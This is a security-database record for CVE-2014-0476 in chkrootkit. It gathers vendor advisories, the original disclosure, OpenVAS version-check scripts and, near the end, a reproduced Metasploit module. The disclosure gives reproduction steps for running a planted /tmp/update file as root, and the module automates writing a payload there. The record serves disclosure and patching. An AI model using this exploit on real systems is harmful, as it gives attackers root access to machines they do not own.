ID DEBIAN:3730DC3DDEE665F4BC46FDFA5C12DE34:559F0 Type debian Reporter Debian Modified 2014-06-04T10:42:00
Description
Package : chkrootkit
Version : 0.49-4+deb6u1
CVE ID : CVE-2014-0476
Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit
detector, which may allow local attackers to gain root access when /tmp
is mounted without the noexec option.
Linked records (cve, securityvulns, openvas, gentoo, zdt, exploitdb)

cve : CVE-2014-0476
Title : CVE-2014-0476
Type : cve (bulletinFamily NVD, edition 5)
Published : 2014-10-25T22:55:00
Modified : 2017-09-19T01:36:00
Last seen : 2020-12-09T19:58:20
CWE : CWE-20
Href : https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0476
Description : The slapper function in chkrootkit before 0.50 does not properly quote file paths, which allows local users to execute arbitrary code via a Trojan horse executable. NOTE: this is only a vulnerability when /tmp is not mounted with the noexec option.
CVSS v2 : 3.7 (LOW), vector AV:L/AC:H/Au:N/C:P/I:P/A:P (access vector LOCAL, access complexity HIGH, authentication NONE, confidentiality/integrity/availability impact PARTIAL; exploitability score 1.9, impact score 6.4; obtainAllPrivilege, obtainUserPrivilege, obtainOtherPrivilege and userInteractionRequired all false). No CVSS v3 data.
CPE : cpe:/a:chkrootkit:chkrootkit:0.49, cpe:/o:canonical:ubuntu_linux:10.04, cpe:/o:canonical:ubuntu_linux:12.04, cpe:/o:canonical:ubuntu_linux:13.10, cpe:/o:canonical:ubuntu_linux:14.04
CPE 2.3 : cpe:2.3:a:chkrootkit:chkrootkit:0.49:*:*:*:*:*:*:*, cpe:2.3:o:canonical:ubuntu_linux:10.04:*:lts:*:*:*:*:*, cpe:2.3:o:canonical:ubuntu_linux:12.04:*:lts:*:*:*:*:*, cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*, cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*

securityvulns : SECURITYVULNS:DOC:30791
Title : [oss-security] CVE-2014-0476 chkrootkit vulnerability
Type : securityvulns (bulletinFamily software, edition 1)
Published : 2014-06-09
Modified : 2014-06-09
Last seen : 2018-08-31T11:10:52
Href : https://vulners.com/securityvulns/SECURITYVULNS:DOC:30791
CVSS : 3.7, vector AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/
Description (the oss-security post) :

Hi,

Thomas Stangner reported the following chkrootkit vulnerability.

We assigned CVE-2014-0476

Cheers,
Giuseppe

-------- Original Message --------
Subject: Serious chkrootkit vulnerability
Date: Sun, 25 May 2014 00:53:00 +0200
From: Thomas Stangner <thomas.stangner@hetzner.de>
Organization: Hetzner Online AG
To: team@security.debian.org

Hi,

we just found a serious vulnerability in the chkrootkit package, which may allow local attackers to gain root access to a box in certain configurations (/tmp not mounted noexec).

The vulnerability is located in the function slapper() in the shellscript chkrootkit:

```sh
#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
    SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
    SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
    ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
    SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
    OPT=-an
    STATUS=0
    file_port=

    if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">/dev/null 2>&1
    then
        STATUS=1
        [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
            $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' | tr -d :`
    fi
    for i in ${SLAPPER_FILES}; do
        if [ -f ${i} ]; then
            # Unquoted assignment: when $file_port is empty this line runs $i
            file_port=$file_port $i
            STATUS=1
        fi
    done
    if [ ${STATUS} -eq 1 ] ;then
        echo "Warning: Possible Slapper Worm installed ($file_port)"
    else
        if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
        return ${NOT_INFECTED}
    fi
}
```

The line 'file_port=$file_port $i' will execute all files specified in $SLAPPER_FILES as the user chkrootkit is running (usually root), if $file_port is empty, because of missing quotation marks around the variable assignment.

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in cron.daily) and has write access to /tmp (not mounted noexec), he may easily take advantage of this.

Suggested fix: Put quotation marks around the assignment.

```sh
file_port="$file_port $i"
```

I will also try to contact upstream, although the latest version of chkrootkit dates back to 2009 - will have to see if I reach a dev there.

Keep up the good work,

Cheers,
Thomas

securityvulns : SECURITYVULNS:VULN:13815
Title : chkrootkit privilege escalation
Type : securityvulns (bulletinFamily software, edition 1)
Published : 2014-06-09
Modified : 2014-06-09
Last seen : 2018-08-31T11:09:55
Href : https://vulners.com/securityvulns/SECURITYVULNS:VULN:13815
CVSS : 3.7, vector AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/
Description : It's possible to execute file from /tmp

openvas : OPENVAS:702945
Title : Debian Security Advisory DSA 2945-1 (chkrootkit - security update)
Type : openvas (bulletinFamily scanner)
Published : 2014-06-03
Modified : 2017-07-10
Last seen : 2017-07-25T10:48:48
Href : http://plugins.openvas.org/nasl.php?oid=702945
CVSS : 3.7, vector AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/
Description : Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit detector, which may allow local attackers to gain root access when /tmp is mounted without the noexec option.
Source (deb_2945.nasl, revision 6637) :

```
# OpenVAS Vulnerability Test
# $Id: deb_2945.nasl 6637 2017-07-10 09:58:13Z teissa $
# Auto-generated from advisory DSA 2945-1 using nvtgen 1.0
# Script version: 1.0
#
# Author:
# Greenbone Networks
#
# Copyright:
# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_affected = "chkrootkit on Debian Linux";
tag_insight = "The chkrootkit security scanner searches the local system for signs
that it is infected with a 'rootkit'. Rootkits are set of programs
and hacks designed to take control of a target machine by using known
security flaws.";
tag_solution = "For the stable distribution (wheezy), this problem has been fixed in
version 0.49-4.1+deb7u2.

For the unstable distribution (sid), this problem has been fixed in
version 0.49-5.

We recommend that you upgrade your chkrootkit packages.";
tag_summary = "Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit
detector, which may allow local attackers to gain root access when /tmp
is mounted without the noexec option.";
tag_vuldetect = "This check tests the installed software version using the apt package manager.";

if(description)
{
  script_id(702945);
  script_version("$Revision: 6637 $");
  script_cve_id("CVE-2014-0476");
  script_name("Debian Security Advisory DSA 2945-1 (chkrootkit - security update)");
  script_tag(name: "last_modification", value:"$Date: 2017-07-10 11:58:13 +0200 (Mon, 10 Jul 2017) $");
  script_tag(name: "creation_date", value:"2014-06-03 00:00:00 +0200 (Tue, 03 Jun 2014)");
  script_tag(name:"cvss_base", value:"3.7");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:H/Au:N/C:P/I:P/A:P");

  script_xref(name: "URL", value: "http://www.debian.org/security/2014/dsa-2945.html");

  script_category(ACT_GATHER_INFO);

  script_copyright("Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net");
  script_family("Debian Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages");
  script_tag(name: "affected", value: tag_affected);
  script_tag(name: "insight", value: tag_insight);
# script_tag(name: "impact", value: tag_impact);
  script_tag(name: "solution", value: tag_solution);
  script_tag(name: "summary", value: tag_summary);
  script_tag(name: "vuldetect", value: tag_vuldetect);
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-deb.inc");

res = "";
report = "";
if ((res = isdpkgvuln(pkg:"chkrootkit", ver:"0.49-4.1+deb7u2", rls:"DEB7.0")) != NULL) {
  report += res;
}
if ((res = isdpkgvuln(pkg:"chkrootkit", ver:"0.49-4.1+deb7u2", rls:"DEB7.1")) != NULL) {
  report += res;
}
if ((res = isdpkgvuln(pkg:"chkrootkit", ver:"0.49-4.1+deb7u2", rls:"DEB7.2")) != NULL) {
  report += res;
}
if ((res = isdpkgvuln(pkg:"chkrootkit", ver:"0.49-4.1+deb7u2", rls:"DEB7.3")) != NULL) {
  report += res;
}

if (report != "") {
  security_message(data:report);
} else if (__pkg_match) {
  exit(99); # Not vulnerable.
}
```

openvas : OPENVAS:1361412562310120579
Title : Amazon Linux: Security Advisory (ALAS-2014-370)
Type : openvas (bulletinFamily scanner)
Published : 2015-09-08
Modified : 2020-03-13
Last seen : 2020-03-17T23:00:27
Href : http://plugins.openvas.org/nasl.php?oid=1361412562310120579
CVSS : 3.7, vector AV:L/AC:H/Au:N/C:P/I:P/A:P
Description : The remote host is missing an update announced via the referenced Security Advisory.
Source :

```
# Copyright (C) 2015 Eero Volotinen
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (C) of their respective author(s)
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.120579");
  script_version("2020-03-13T13:19:50+0000");
  script_tag(name:"creation_date", value:"2015-09-08 13:29:59 +0200 (Tue, 08 Sep 2015)");
  script_tag(name:"last_modification", value:"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)");
  script_name("Amazon Linux: Security Advisory (ALAS-2014-370)");
  script_tag(name:"insight", value:"A quoting issue was found in chkrootkit which would lead to a file in /tmp/ being executed, if /tmp/ was mounted without the noexec option. chkrootkit is typically run as the root user. A local attacker could use this flaw to escalate their privileges.");
  script_tag(name:"solution", value:"Run yum update chkrootkit to update your system.");
  script_tag(name:"solution_type", value:"VendorFix");
  script_xref(name:"URL", value:"https://alas.aws.amazon.com/ALAS-2014-370.html");
  script_cve_id("CVE-2014-0476");
  script_tag(name:"cvss_base", value:"3.7");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:H/Au:N/C:P/I:P/A:P");
  script_tag(name:"qod_type", value:"package");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/amazon_linux", "ssh/login/release");
  script_category(ACT_GATHER_INFO);
  script_tag(name:"summary", value:"The remote host is missing an update announced via the referenced Security Advisory.");
  script_copyright("Copyright (C) 2015 Eero Volotinen");
  script_family("Amazon Linux Local Security Checks");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";
report = "";

if(release == "AMAZON") {
  if(!isnull(res = isrpmvuln(pkg:"chkrootkit-debuginfo", rpm:"chkrootkit-debuginfo~0.49~9.8.amzn1", rls:"AMAZON"))) {
    report += res;
  }

  if(!isnull(res = isrpmvuln(pkg:"chkrootkit", rpm:"chkrootkit~0.49~9.8.amzn1", rls:"AMAZON"))) {
    report += res;
  }

  if(report != "") {
    security_message(data:report);
  } else if(__pkg_match) {
    exit(99);
  }
  exit(0);
}

exit(0);
```

openvas : OPENVAS:1361412562310841851
Title : Ubuntu Update for chkrootkit USN-2230-1
Type : openvas (bulletinFamily scanner)
Published : 2014-06-09
Modified : 2019-03-13
Last seen : 2019-05-29T18:37:34
Href : http://plugins.openvas.org/nasl.php?oid=1361412562310841851
CVSS : 3.7, vector AV:L/AC:H/Au:N/C:P/I:P/A:P
Description : "The remote host is missing an update for the " (field truncated in the record)
Source (gb_ubuntu_USN_2230_1.nasl, revision 14140) :

```
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_ubuntu_USN_2230_1.nasl 14140 2019-03-13 12:26:09Z cfischer $
#
# Ubuntu Update for chkrootkit USN-2230-1
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.841851");
  script_version("$Revision: 14140 $");
  script_tag(name:"last_modification", value:"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $");
  script_tag(name:"creation_date", value:"2014-06-09 15:19:24 +0530 (Mon, 09 Jun 2014)");
  script_cve_id("CVE-2014-0476");
  script_tag(name:"cvss_base", value:"3.7");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:H/Au:N/C:P/I:P/A:P");
  script_name("Ubuntu Update for chkrootkit USN-2230-1");

  script_tag(name:"affected", value:"chkrootkit on Ubuntu 14.04 LTS,
  Ubuntu 13.10,
  Ubuntu 12.04 LTS,
  Ubuntu 10.04 LTS");
  script_tag(name:"insight", value:"Thomas Stangner discovered that chkrootkit incorrectly quoted
certain values. A local attacker could use this issue to execute arbitrary code
when chkrootkit is run and gain root privileges.");
  script_tag(name:"solution", value:"Please Install the Updated Packages.");
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");
  script_xref(name:"USN", value:"2230-1");
  script_xref(name:"URL", value:"http://www.ubuntu.com/usn/usn-2230-1/");
  script_tag(name:"summary", value:"The remote host is missing an update for the 'chkrootkit'
  package(s) announced via the referenced advisory.");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
  script_family("Ubuntu Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/ubuntu_linux", "ssh/login/packages", re:"ssh/login/release=UBUNTU(14\.04 LTS|12\.04 LTS|10\.04 LTS|13\.10)");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-deb.inc");

release = dpkg_get_ssh_release();
if(!release)
  exit(0);

res = "";

if(release == "UBUNTU14.04 LTS")
{
  if ((res = isdpkgvuln(pkg:"chkrootkit", ver:"0.49-4.1ubuntu1.14.04.1", rls:"UBUNTU14.04 LTS")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}

if(release == "UBUNTU12.04 LTS")
{
  if ((res = isdpkgvuln(pkg:"chkrootkit", ver:"0.49-4ubuntu1.1", rls:"UBUNTU12.04 LTS")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}

if(release == "UBUNTU10.04 LTS")
{
  if ((res = isdpkgvuln(pkg:"chkrootkit", ver:"0.49-3ubuntu0.1", rls:"UBUNTU10.04 LTS")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}

if(release == "UBUNTU13.10")
{
  if ((res = isdpkgvuln(pkg:"chkrootkit", ver:"0.49-4.1ubuntu1.13.10.1", rls:"UBUNTU13.10")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}
```

openvas : OPENVAS:1361412562310867866
Title : Fedora Update for chkrootkit FEDORA-2014-7071
Type : openvas (bulletinFamily scanner)
Published : 2014-06-17
Modified : 2019-03-15
Last seen : 2019-05-29T18:37:38
Href : http://plugins.openvas.org/nasl.php?oid=1361412562310867866
CVSS : 3.7, vector AV:L/AC:H/Au:N/C:P/I:P/A:P
Description : "The remote host is missing an update for the " (field truncated in the record)
Source :

```
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for chkrootkit FEDORA-2014-7071
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.867866");
  script_version("$Revision: 14223 $");
  script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
  script_tag(name:"creation_date", value:"2014-06-17 09:54:03 +0530 (Tue, 17 Jun 2014)");
  script_cve_id("CVE-2014-0476");
  script_tag(name:"cvss_base", value:"3.7");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:H/Au:N/C:P/I:P/A:P");
  script_name("Fedora Update for chkrootkit FEDORA-2014-7071");
  script_tag(name:"affected", value:"chkrootkit on Fedora 20");
  script_tag(name:"solution", value:"Please install the updated package(s).");
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");
  script_xref(name:"FEDORA", value:"2014-7071");
  script_xref(name:"URL", value:"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134326.html");
  script_tag(name:"summary", value:"The remote host is missing an update for the 'chkrootkit'
  package(s) announced via the referenced advisory.");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
  script_family("Fedora Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC20");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";

if(release == "FC20")
{
  if ((res = isrpmvuln(pkg:"chkrootkit", rpm:"chkrootkit~0.49~9.fc20", rls:"FC20")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}
```

openvas : OPENVAS:1361412562310702945
Title : Debian Security Advisory DSA 2945-1 (chkrootkit - security update)
Type : openvas (bulletinFamily scanner)
Published : 2014-06-03
Modified : 2019-03-19
Last seen : 2019-05-29T18:37:45
Href : http://plugins.openvas.org/nasl.php?oid=1361412562310702945
CVSS : 3.7, vector AV:L/AC:H/Au:N/C:P/I:P/A:P
Description : Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit detector, which may allow local attackers to gain root access when /tmp is mounted without the noexec option.
Source (deb_2945.nasl, revision 14302) :

```
# OpenVAS Vulnerability Test
# $Id: deb_2945.nasl 14302 2019-03-19 08:28:48Z cfischer $
# Auto-generated from advisory DSA 2945-1 using nvtgen 1.0
# Script version: 1.0
#
# Author:
# Greenbone Networks
#
# Copyright:
# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.702945");
  script_version("$Revision: 14302 $");
  script_cve_id("CVE-2014-0476");
  script_name("Debian Security Advisory DSA 2945-1 (chkrootkit - security update)");
  script_tag(name:"last_modification", value:"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $");
  script_tag(name:"creation_date", value:"2014-06-03 00:00:00 +0200 (Tue, 03 Jun 2014)");
  script_tag(name:"cvss_base", value:"3.7");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:H/Au:N/C:P/I:P/A:P");

  script_xref(name:"URL", value:"http://www.debian.org/security/2014/dsa-2945.html");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net");
  script_family("Debian Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages", re:"ssh/login/release=DEB7");
  script_tag(name:"affected", value:"chkrootkit on Debian Linux");
  script_tag(name:"solution", value:"For the stable distribution (wheezy), this problem has been fixed in
version 0.49-4.1+deb7u2.

For the unstable distribution (sid), this problem has been fixed in
version 0.49-5.

We recommend that you upgrade your chkrootkit packages.");
  script_tag(name:"summary", value:"Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit
detector, which may allow local attackers to gain root access when /tmp
is mounted without the noexec option.");
  script_tag(name:"vuldetect", value:"This check tests the installed software version using the apt package manager.");
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-deb.inc");

res = "";
report = "";
if((res = isdpkgvuln(pkg:"chkrootkit", ver:"0.49-4.1+deb7u2", rls:"DEB7")) != NULL) {
  report += res;
}

if(report != "") {
  security_message(data:report);
} else if(__pkg_match) {
  exit(99);
}
```

openvas : OPENVAS:1361412562310867899
Title : Fedora Update for chkrootkit FEDORA-2014-7090
Type : openvas (bulletinFamily scanner)
Published : 2014-06-17
Modified : 2019-03-15
Last seen : 2019-05-29T18:37:17
Href : http://plugins.openvas.org/nasl.php?oid=1361412562310867899
CVSS : 3.7, vector AV:L/AC:H/Au:N/C:P/I:P/A:P
Description : "The remote host is missing an update for the " (field truncated in the record)
Source :

```
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for chkrootkit FEDORA-2014-7090
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.867899");
  script_version("$Revision: 14223 $");
  script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
  script_tag(name:"creation_date", value:"2014-06-17 10:02:17 +0530 (Tue, 17 Jun 2014)");
  script_cve_id("CVE-2014-0476");
  script_tag(name:"cvss_base", value:"3.7");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:H/Au:N/C:P/I:P/A:P");
  script_name("Fedora Update for chkrootkit FEDORA-2014-7090");
  script_tag(name:"affected", value:"chkrootkit on Fedora 19");
  script_tag(name:"solution", value:"Please install the updated package(s).");
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");
  script_xref(name:"FEDORA", value:"2014-7090");
  script_xref(name:"URL", value:"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134341.html");
  script_tag(name:"summary", value:"The remote host is missing an update for the 'chkrootkit'
  package(s) announced via the referenced advisory.");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
  script_family("Fedora Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC19");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";

if(release == "FC19")
{
  if ((res = isrpmvuln(pkg:"chkrootkit", rpm:"chkrootkit~0.49~9.fc19", rls:"FC19")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}
```

gentoo : GLSA-201709-05
Title : chkrootkit: Local privilege escalation
Type : gentoo (bulletinFamily unix, edition 1)
Published : 2017-09-17
Modified : 2017-09-17
Last seen : 2017-09-17T20:44:52
Href : https://security.gentoo.org/glsa/201709-05
CVSS : 3.7, vector AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/
Description :

### Background

chkrootkit is a tool to locally check for signs of a rootkit.

### Description

When /tmp is mounted without the noexec option chkrootkit will execute files in /tmp with root privileges.

### Impact

A local attacker could possibly execute arbitrary code with root privileges.

### Workaround

Users should mount /tmp with noexec option.

### Resolution

All chkrootkit users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-forensics/chkrootkit-0.50"

zdt : 1337DAY-ID-22384
Title : chkrootkit 0.49 - Local Root Vulnerability
Type : zdt (bulletinFamily exploit, edition 2)
Published : 2014-06-28
Modified : 2014-06-28
Last seen : 2018-01-08T15:16:17
Href : https://0day.today/exploit/description/22384
Source href : https://0day.today/exploit/22384
CVSS : 3.7, vector AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/
Description : Exploit for linux platform in category local exploits
Source : the text of Thomas Stangner's report reproduced above (from "We just found a serious vulnerability in the chkrootkit package" to "will have to see, if I reach a dev there"), followed by the footer "# 0day.today [2018-01-08] #"

zdt : 1337DAY-ID-24595
Title : Chkrootkit Local Privilege Escalation Exploit
Type : zdt (bulletinFamily exploit, edition 2)
Published : 2015-11-20
Modified : 2015-11-20
Last seen : 2018-01-01T07:03:13
Href : https://0day.today/exploit/description/24595
Source href : https://0day.today/exploit/24595
CVSS : 3.7, vector AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/
Description : Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privsec. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.
Source (Metasploit module) :

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local

  # This could also be Excellent, but since it requires
  # up to one day to pop a shell, let's set it to Manual instead.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Chkrootkit Local Privilege Escalation',
      'Description' => %q{
        Chkrootkit before 0.50 will run any executable file named
        /tmp/update as root, allowing a trivial privsec.

        WfsDelay is set to 24h, since this is how often a chkrootkit
        scan is scheduled by default.
      },
      'Author' => [
        'Thomas Stangner', # Original exploit
        'Julien "jvoisin" Voisin' # Metasploit module
      ],
      'References' => [
        ['CVE', '2014-0476'],
        ['OSVDB', '107710'],
        ['EDB', '33899'],
        ['BID', '67813'],
        ['CWE', '20'],
        ['URL', 'http://seclists.org/oss-sec/2014/q2/430']
      ],
      'DisclosureDate' => 'Jun 04 2014',
      'License' => MSF_LICENSE,
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'SessionTypes' => ['shell', 'meterpreter'],
      'Privileged' => true,
      'Stance' => Msf::Exploit::Stance::Passive,
      'Targets' => [['Automatic', {}]],
      'DefaultTarget' => 0,
      'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
    ))

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  def check
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")

    if version =~ /chkrootkit version 0\.[1-4]/
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')

    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
    cmd_exec('chmod +x /tmp/update')
    register_file_for_cleanup('/tmp/update')

    print_status('Payload written to /tmp/update')
    print_status('Waiting for chkrootkit to run via cron...')
  end

end
```

Footer : # 0day.today [2018-01-01] #

exploitdb : (record truncated)
Last seen : 2016-02-04T08:49:27
Description : Chkrootkit Local Privilege Escalation. CVE-2014-0476.
